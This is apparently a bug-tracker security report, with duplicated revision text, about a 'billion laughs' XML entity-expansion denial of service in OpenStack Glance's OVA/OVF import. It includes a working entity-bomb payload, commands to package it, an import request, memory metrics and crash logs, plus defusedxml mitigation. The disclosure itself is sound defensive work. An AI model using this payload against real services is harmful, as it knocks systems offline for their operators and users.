2016-09-20 00:18:50.907 12743 DEBUG oslo_concurrency.processutils [-] Running cmd (subprocess): qemu-img info --output=json file:///home/stack/work/586fe0b7-1b29-488a-a4b9-91958c446504 execute /usr/local/lib/python2.7/dist-packages/oslo_concurrency/processutils.py:344
2016-09-20 00:18:52.582 12743 DEBUG oslo_concurrency.processutils [-] CMD "qemu-img info --output=json file:///home/stack/work/586fe0b7-1b29-488a-a4b9-91958c446504" returned: 0 in 1.676s execute /usr/local/lib/python2.7/dist-packages/oslo_concurrency/processutils.py:374
2016-09-20 00:18:52.633 12743 DEBUG glance.async.taskflow_executor [-] Task 'import-ImportToFS-6da2d2bc-0bf1-4063-be3c-f571a3f8bcac' (2f07c300-65b4-4dd5-a93a-87eaf8d388c6) transitioned into state 'SUCCESS' from state 'RUNNING' with result 'file:///home/stack/work/586fe0b7-1b29-488a-a4b9-91958c446504' _task_receiver /usr/local/lib/python2.7/dist-packages/taskflow/listeners/logging.py:178
2016-09-20 00:18:52.640 12743 DEBUG glance.async.taskflow_executor [-] Task 'import-OVF_Process-6da2d2bc-0bf1-4063-be3c-f571a3f8bcac' (da37d5f2-52bd-46ca-bfc4-13a0f926afd3) transitioned into state 'RUNNING' from state 'PENDING' _task_receiver /usr/local/lib/python2.7/dist-packages/taskflow/listeners/logging.py:189
2016-09-20 00:18:52.670 12743 WARNING glance.async.flows.ovf_process [-] OVF properties config file "ovf-metadata.json" was not found.
2016-09-20 00:19:08.116 12744 DEBUG eventlet.wsgi.server [-] (12744) accepted ('10.0.2.2', 51290) server /usr/local/lib/python2.7/dist-packages/eventlet/wsgi.py:868
2016-09-20 00:19:08.200 12744 DEBUG glance.api.middleware.version_negotiation [-] Determining version of request: POST /v2/tasks Accept: application/json process_request /opt/stack/glance/glance/api/middleware/version_negotiation.py:46
2016-09-20 00:19:08.203 12744 DEBUG glance.api.middleware.version_negotiation [-] Using url versioning process_request /opt/stack/glance/glance/api/middleware/version_negotiation.py:58
2016-09-20 00:19:08.206 12744 DEBUG glance.api.middleware.version_negotiation [-] Matched version: v2 process_request /opt/stack/glance/glance/api/middleware/version_negotiation.py:70
2016-09-20 00:19:08.208 12744 DEBUG glance.api.middleware.version_negotiation [-] new path /v2/tasks process_request /opt/stack/glance/glance/api/middleware/version_negotiation.py:71
2016-09-20 00:19:09.610 11832 INFO glance.common.wsgi [-] Removed dead child 12744
2016-09-20 00:19:09.661 11832 DEBUG glance.common.wsgi [-] No stale children _verify_and_respawn_children /opt/stack/glance/glance/common/wsgi.py:548
2016-09-20 00:19:09.681 11832 CRITICAL glance [-] OSError: [Errno 12] Cannot allocate memory
2016-09-20 00:19:09.681 11832 ERROR glance Traceback (most recent call last):
2016-09-20 00:19:09.681 11832 ERROR glance File "/usr/local/bin/glance-api", line 10, in <module>
2016-09-20 00:19:09.681 11832 ERROR glance sys.exit(main())
2016-09-20 00:19:09.681 11832 ERROR glance File "/opt/stack/glance/glance/cmd/api.py", line 92, in main
2016-09-20 00:19:09.681 11832 ERROR glance server.wait()
2016-09-20 00:19:09.681 11832 ERROR glance File "/opt/stack/glance/glance/common/wsgi.py", line 626, in wait
2016-09-20 00:19:09.681 11832 ERROR glance self.wait_on_children()
2016-09-20 00:19:09.681 11832 ERROR glance File "/opt/stack/glance/glance/common/wsgi.py", line 566, in wait_on_children
2016-09-20 00:19:09.681 11832 ERROR glance self._verify_and_respawn_children(pid, status)
2016-09-20 00:19:09.681 11832 ERROR glance File "/opt/stack/glance/glance/common/wsgi.py", line 558, in _verify_and_respawn_children
2016-09-20 00:19:09.681 11832 ERROR glance self.run_child()
2016-09-20 00:19:09.681 11832 ERROR glance File "/opt/stack/glance/glance/common/wsgi.py", line 639, in run_child
2016-09-20 00:19:09.681 11832 ERROR glance pid = os.fork()
2016-09-20 00:19:09.681 11832 ERROR glance OSError: [Errno 12] Cannot allocate memory
2016-09-20 00:19:09.681 11832 ERROR glance
g-api failed to start
-----------------------------------------
Mitigation
-----------------------------------------
Any use of xml.etree should be replaced with the equivalent interface from a secure XML parsing library such as defusedxml [4].
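Until a defused library is adopted, one stopgap is to reject any OVF descriptor that carries a DTD before it ever reaches ET.iterparse(), since entity bombs must be declared in a DOCTYPE and OVF descriptors have no legitimate need for one. This is only a hypothetical sketch of that pre-parse guard, not Glance's implementation; the function name `safe_iterparse` is invented here, and defusedxml remains the proper fix:

```python
import io
import re
import xml.etree.ElementTree as ET

# Entity bombs ("billion laughs") are declared inside <!DOCTYPE ...>.
# OVF descriptors do not need a DTD, so its mere presence is grounds for
# rejection before the expat parser can begin expanding entities.
_DOCTYPE = re.compile(br"<!\s*DOCTYPE", re.IGNORECASE)

def safe_iterparse(xml_bytes):
    """Refuse DTD-bearing XML, then hand the rest to ET.iterparse()."""
    if _DOCTYPE.search(xml_bytes):
        raise ValueError("DTD found in OVF descriptor; refusing to parse")
    return ET.iterparse(io.BytesIO(xml_bytes))
```

With defusedxml installed, the equivalent one-line change is to import defusedxml.ElementTree in place of xml.etree.ElementTree, which raises an exception (rather than expanding entities) on input like the payload above.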
1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24
2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184
3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities
4: https://pypi.python.org/pypi/defusedxml
-----------------------------------------
Other
-----------------------------------------
Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using Syntribos (https://github.com/openstack/syntribos), our API security testing tool, along with Bandit, which was used to discover this issue. |
|
2016-09-20 00:25:59 |
Charles Neill |
bug |
|
|
added subscriber Rahul U Nair |
2016-09-20 00:28:10 |
Charles Neill |
description |
Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process.
This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing.
As outlined in the Python documentation, xml.etree is susceptible to the "billion laughs" attack when parsing untrusted input [3].
-----------------------------------------
Example request
-----------------------------------------
POST /v2/tasks HTTP/1.1
Host: localhost:1338
Connection: close
Accept-Encoding: gzip, deflate
Accept: application/json
User-Agent: python-requests/2.11.1
Content-Type: application/json
X-Auth-Token: [ADMIN TOKEN]
Content-Length: 287
{
"type": "import",
"input": {
"import_from": "http://127.0.0.1:9090/laugh.ova",
"import_from_format": "raw",
"image_properties": {
"disk_format": "raw",
"container_format": "ova",
"name": "laugh"
}
}
}
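The raw request above can be reproduced with the Python 3 standard library alone. This is a sketch; the endpoint and token are placeholders copied from the report, and nothing here is Glance client code:

```python
import json
import urllib.request

# Environment-specific placeholders, mirroring the raw request above.
GLANCE = "http://localhost:1338"
TOKEN = "[ADMIN TOKEN]"

task = {
    "type": "import",
    "input": {
        "import_from": "http://127.0.0.1:9090/laugh.ova",
        "import_from_format": "raw",
        "image_properties": {
            "disk_format": "raw",
            "container_format": "ova",
            "name": "laugh",
        },
    },
}

def submit_task():
    """POST the import task to the v2 tasks API (requires a live endpoint)."""
    req = urllib.request.Request(
        GLANCE + "/v2/tasks",
        data=json.dumps(task).encode(),
        headers={"Content-Type": "application/json", "X-Auth-Token": TOKEN},
        method="POST",
    )
    return urllib.request.urlopen(req)
```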
-----------------------------------------
Creating the malicious OVA/OVF
-----------------------------------------
"laugh.ova" can be created like so:
1. Copy this into a file called "laugh.ovf":
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
]>
<lolz>&lol10;</lolz>
2. Create the OVA file (tarball) with the "tar" utility:
$ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova
3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:
$ python -m SimpleHTTPServer 9090
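The payload expands exponentially: each of the ten ENTITY levels repeats the previous one ten times, so a single &lol10; reference expands to 10^10 copies of "lol", roughly 30 GB of text from a file of about 1 KB. A sketch of that arithmetic, plus step 2 scripted with the stdlib tarfile module (filenames taken from the steps above):

```python
import tarfile

# Each ENTITY level repeats the previous one 10 times, starting from "lol".
LEVELS = 10
expanded_lols = 10 ** LEVELS              # 10,000,000,000 copies of "lol"
expanded_bytes = expanded_lols * len("lol")  # ~30 GB from a ~1 KB OVF

def build_ova(ovf_path="laugh.ovf", ova_path="laugh.ova"):
    """Wrap the OVF in a plain (uncompressed) tar, as in step 2 above."""
    with tarfile.open(ova_path, "w") as tar:
        tar.add(ovf_path)
```

The OVA container itself is just an uncompressed tarball, which is why the `tar -cf` step above is sufficient.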
-----------------------------------------
Performance impact
-----------------------------------------
Profiling my VM from a fresh boot:
$ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting this task twice (repeating calls to the above command):
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request":
2016-09-20 00:18:50.060 12743 INFO eventlet.wsgi.server [req-7b00a8f9-9fd6-4434-9c8b-87cc88ae2c06 1fadb086cfd94c1d8ab9d554657054d1 3330be90ba344c34b34afc27de7e7195 - default default] 10.0.2.2 - - [20/Sep/2016 00:18:50] "POST /v2/tasks HTTP/1.1" 201 796 4.892790
2016-09-20 00:18:50.076 12743 INFO glance.domain [-] Task [6da2d2bc-0bf1-4063-be3c-f571a3f8bcac] status changing from processing to processing
2016-09-20 00:18:50.083 12743 DEBUG oslo_messaging._drivers.amqpdriver [-] CAST unique_id: dcc1e3e9d69e4e69a3f1f3737fe62040 NOTIFY exchange 'glance' topic 'notifications.info' _send /usr/local/lib/python2.7/dist-packages/oslo_messaging/_drivers/amqpdriver.py:432
2016-09-20 00:18:50.120 12743 DEBUG glance.async.taskflow_executor [-] Taskflow executor picked up the execution of task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac of task type import _run /opt/stack/glance/glance/async/taskflow_executor.py:152
2016-09-20 00:18:50.202 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.sheepdog.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.204 12743 DEBUG glance_store.backend [-] Attempting to import store rbd _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.207 12743 DEBUG glance_store.backend [-] Attempting to import store http _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.210 12743 DEBUG glance_store.backend [-] Attempting to import store file _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.214 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.http.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.215 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.rbd.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.218 12743 DEBUG glance_store.backend [-] Attempting to import store vmware _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.220 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.cinder.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.222 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.filesystem.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.223 12743 DEBUG glance_store.backend [-] Attempting to import store cinder _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.225 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.swift.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.227 12743 DEBUG glance_store.backend [-] Attempting to import store swift _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.230 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.vmware_datastore.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.233 12743 DEBUG glance_store.backend [-] Attempting to import store sheepdog _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.236 12743 DEBUG glance_store.backend [-] Attempting to import store no_conf _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.239 12743 DEBUG glance_store.backend [-] Registering options for group glance_store register_opts /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:154
2016-09-20 00:18:50.243 12743 DEBUG glance_store.backend [-] Registering options for group glance_store register_opts /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:154
2016-09-20 00:18:50.244 12743 DEBUG glance_store.backend [-] Attempting to import store file _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.247 12743 DEBUG glance_store.capabilities [-] Store glance_store._drivers.filesystem.Store doesn't support updating dynamic storage capabilities. Please overwrite 'update_capabilities' method of the store to implement updating logics if needed. update_capabilities /usr/local/lib/python2.7/dist-packages/glance_store/capabilities.py:97
2016-09-20 00:18:50.269 12743 DEBUG glance.async.flows.introspect [-] Flow: import with ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac on <glance.api.authorization.ImageRepoProxy object at 0x7f066ecdbf90> get_flow /opt/stack/glance/glance/async/flows/introspect.py:92
2016-09-20 00:18:50.277 12743 DEBUG glance.async.flows.ovf_process [-] Flow: import with ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac on <glance.api.authorization.ImageRepoProxy object at 0x7f066ecdbf90> get_flow /opt/stack/glance/glance/async/flows/ovf_process.py:264
2016-09-20 00:18:50.691 12743 DEBUG glance.async.taskflow_executor [-] Flow 'import' (ead420f3-4e84-42e5-9a2b-c2b5752454f6) transitioned into state 'RUNNING' from state 'PENDING' _flow_receiver /usr/local/lib/python2.7/dist-packages/taskflow/listeners/logging.py:140
2016-09-20 00:18:50.719 12743 DEBUG glance.async.taskflow_executor [-] Task 'import-CreateImage-6da2d2bc-0bf1-4063-be3c-f571a3f8bcac' (44a2ebaa-6825-4539-a874-0e1bfd3a94c5) transitioned into state 'RUNNING' from state 'PENDING' _task_receiver /usr/local/lib/python2.7/dist-packages/taskflow/listeners/logging.py:189
2016-09-20 00:18:50.739 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property status for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.740 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property schema for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.742 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property file for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.745 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property direct_url for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.751 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property tags for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.753 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property locations for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.755 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property checksum for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.756 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property created_at for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.759 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property updated_at for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.761 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property visibility for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.763 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property self for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.765 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property min_disk for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.768 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property protected for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.769 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property min_ram for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.771 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property owner for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.772 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property virtual_size for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.774 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property id for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.776 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property size for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.848 12743 DEBUG oslo_messaging._drivers.amqpdriver [-] CAST unique_id: d07a0965d2fb40b895d029f52605e2de NOTIFY exchange 'glance' topic 'notifications.info' _send /usr/local/lib/python2.7/dist-packages/oslo_messaging/_drivers/amqpdriver.py:432
2016-09-20 00:18:50.854 12743 DEBUG glance.async.flows.base_import [-] Task 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac created image 586fe0b7-1b29-488a-a4b9-91958c446504 execute /opt/stack/glance/glance/async/flows/base_import.py:69
2016-09-20 00:18:50.876 12743 DEBUG glance.async.taskflow_executor [-] Task 'import-CreateImage-6da2d2bc-0bf1-4063-be3c-f571a3f8bcac' (44a2ebaa-6825-4539-a874-0e1bfd3a94c5) transitioned into state 'SUCCESS' from state 'RUNNING' with result '586fe0b7-1b29-488a-a4b9-91958c446504' _task_receiver /usr/local/lib/python2.7/dist-packages/taskflow/listeners/logging.py:178
2016-09-20 00:18:50.879 12743 DEBUG glance.async.taskflow_executor [-] Task 'import-ImportToFS-6da2d2bc-0bf1-4063-be3c-f571a3f8bcac' (2f07c300-65b4-4dd5-a93a-87eaf8d388c6) transitioned into state 'RUNNING' from state 'PENDING' _task_receiver /usr/local/lib/python2.7/dist-packages/taskflow/listeners/logging.py:189
2016-09-20 00:18:50.904 12743 DEBUG glance_store._drivers.filesystem [-] Wrote 10240 bytes to /home/stack/work/586fe0b7-1b29-488a-a4b9-91958c446504 with checksum e892216d1977d1a07a1898cbf9f99a38 add /usr/local/lib/python2.7/dist-packages/glance_store/_drivers/filesystem.py:706
2016-09-20 00:18:50.907 12743 DEBUG oslo_concurrency.processutils [-] Running cmd (subprocess): qemu-img info --output=json file:///home/stack/work/586fe0b7-1b29-488a-a4b9-91958c446504 execute /usr/local/lib/python2.7/dist-packages/oslo_concurrency/processutils.py:344
2016-09-20 00:18:52.582 12743 DEBUG oslo_concurrency.processutils [-] CMD "qemu-img info --output=json file:///home/stack/work/586fe0b7-1b29-488a-a4b9-91958c446504" returned: 0 in 1.676s execute /usr/local/lib/python2.7/dist-packages/oslo_concurrency/processutils.py:374
2016-09-20 00:18:52.633 12743 DEBUG glance.async.taskflow_executor [-] Task 'import-ImportToFS-6da2d2bc-0bf1-4063-be3c-f571a3f8bcac' (2f07c300-65b4-4dd5-a93a-87eaf8d388c6) transitioned into state 'SUCCESS' from state 'RUNNING' with result 'file:///home/stack/work/586fe0b7-1b29-488a-a4b9-91958c446504' _task_receiver /usr/local/lib/python2.7/dist-packages/taskflow/listeners/logging.py:178
2016-09-20 00:18:52.640 12743 DEBUG glance.async.taskflow_executor [-] Task 'import-OVF_Process-6da2d2bc-0bf1-4063-be3c-f571a3f8bcac' (da37d5f2-52bd-46ca-bfc4-13a0f926afd3) transitioned into state 'RUNNING' from state 'PENDING' _task_receiver /usr/local/lib/python2.7/dist-packages/taskflow/listeners/logging.py:189
2016-09-20 00:18:52.670 12743 WARNING glance.async.flows.ovf_process [-] OVF properties config file "ovf-metadata.json" was not found.
2016-09-20 00:19:08.116 12744 DEBUG eventlet.wsgi.server [-] (12744) accepted ('10.0.2.2', 51290) server /usr/local/lib/python2.7/dist-packages/eventlet/wsgi.py:868
2016-09-20 00:19:08.200 12744 DEBUG glance.api.middleware.version_negotiation [-] Determining version of request: POST /v2/tasks Accept: application/json process_request /opt/stack/glance/glance/api/middleware/version_negotiation.py:46
2016-09-20 00:19:08.203 12744 DEBUG glance.api.middleware.version_negotiation [-] Using url versioning process_request /opt/stack/glance/glance/api/middleware/version_negotiation.py:58
2016-09-20 00:19:08.206 12744 DEBUG glance.api.middleware.version_negotiation [-] Matched version: v2 process_request /opt/stack/glance/glance/api/middleware/version_negotiation.py:70
2016-09-20 00:19:08.208 12744 DEBUG glance.api.middleware.version_negotiation [-] new path /v2/tasks process_request /opt/stack/glance/glance/api/middleware/version_negotiation.py:71
2016-09-20 00:19:09.610 11832 INFO glance.common.wsgi [-] Removed dead child 12744
2016-09-20 00:19:09.661 11832 DEBUG glance.common.wsgi [-] No stale children _verify_and_respawn_children /opt/stack/glance/glance/common/wsgi.py:548
2016-09-20 00:19:09.681 11832 CRITICAL glance [-] OSError: [Errno 12] Cannot allocate memory
2016-09-20 00:19:09.681 11832 ERROR glance Traceback (most recent call last):
2016-09-20 00:19:09.681 11832 ERROR glance File "/usr/local/bin/glance-api", line 10, in <module>
2016-09-20 00:19:09.681 11832 ERROR glance sys.exit(main())
2016-09-20 00:19:09.681 11832 ERROR glance File "/opt/stack/glance/glance/cmd/api.py", line 92, in main
2016-09-20 00:19:09.681 11832 ERROR glance server.wait()
2016-09-20 00:19:09.681 11832 ERROR glance File "/opt/stack/glance/glance/common/wsgi.py", line 626, in wait
2016-09-20 00:19:09.681 11832 ERROR glance self.wait_on_children()
2016-09-20 00:19:09.681 11832 ERROR glance File "/opt/stack/glance/glance/common/wsgi.py", line 566, in wait_on_children
2016-09-20 00:19:09.681 11832 ERROR glance self._verify_and_respawn_children(pid, status)
2016-09-20 00:19:09.681 11832 ERROR glance File "/opt/stack/glance/glance/common/wsgi.py", line 558, in _verify_and_respawn_children
2016-09-20 00:19:09.681 11832 ERROR glance self.run_child()
2016-09-20 00:19:09.681 11832 ERROR glance File "/opt/stack/glance/glance/common/wsgi.py", line 639, in run_child
2016-09-20 00:19:09.681 11832 ERROR glance pid = os.fork()
2016-09-20 00:19:09.681 11832 ERROR glance OSError: [Errno 12] Cannot allocate memory
2016-09-20 00:19:09.681 11832 ERROR glance
g-api failed to start
-----------------------------------------
Mitigation
-----------------------------------------
Any instances of xml.etree should be replaced with their equivalents from a secure XML parsing library such as defusedxml [4].
1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24
2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184
3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities
4: https://pypi.python.org/pypi/defusedxml
-----------------------------------------
Other
-----------------------------------------
Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). |
Creating a task to import an OVA file containing a malicious OVF file will result in significant memory usage by the glance-api process.
This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing.
As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" attack when parsing untrusted input [3].
-----------------------------------------
Example request
-----------------------------------------
POST /v2/tasks HTTP/1.1
Host: localhost:1338
Connection: close
Accept-Encoding: gzip, deflate
Accept: application/json
User-Agent: python-requests/2.11.1
Content-Type: application/json
X-Auth-Token: [ADMIN TOKEN]
Content-Length: 287
{
"type": "import",
"input": {
"import_from": "http://127.0.0.1:9090/laugh.ova",
"import_from_format": "raw",
"image_properties": {
"disk_format": "raw",
"container_format": "ova",
"name": "laugh"
}
}
}
-----------------------------------------
Creating the malicious OVA/OVF
-----------------------------------------
"laugh.ova" can be created like so:
1. Copy this into a file called "laugh.ovf":
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
